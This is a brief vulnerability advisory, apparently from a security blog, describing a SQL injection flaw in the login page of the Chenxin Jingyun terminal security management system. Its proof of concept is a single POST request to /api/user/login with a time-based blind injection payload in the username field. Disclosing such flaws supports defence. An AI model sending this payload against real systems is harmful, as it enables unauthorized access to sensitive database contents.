Chenxin Lingchuang Chenxin Jingyun Terminal Security Management System Login Sql Injection Vulnerability
Chenxin Lingchuang Chenxin Jingyun Terminal Security Management System Login Sql Injection Vulnerability
Chenxin Lingchuang Chenxin Jingyun terminal security management system login SQL injection vulnerability
Vulnerability Description
Chenxin Lingchuang Chenxin Jingyun terminal security management system has SQL injection vulnerability, and attackers can obtain sensitive database information through the vulnerability
Vulnerability Impact
Chenxin Lingchuang Chenxin Jingyun terminal security management system
Network surveying and mapping
Vulnerability recurrence,
Login page
Verify POC
1
2
3
POST /api/user/login
captcha=&password=21232f297a57a5a743894a0e4a801fc3&username=admin'and(select*from(select+sleep(3))a)='
This post is licensed under CC BY 4.0 by the author.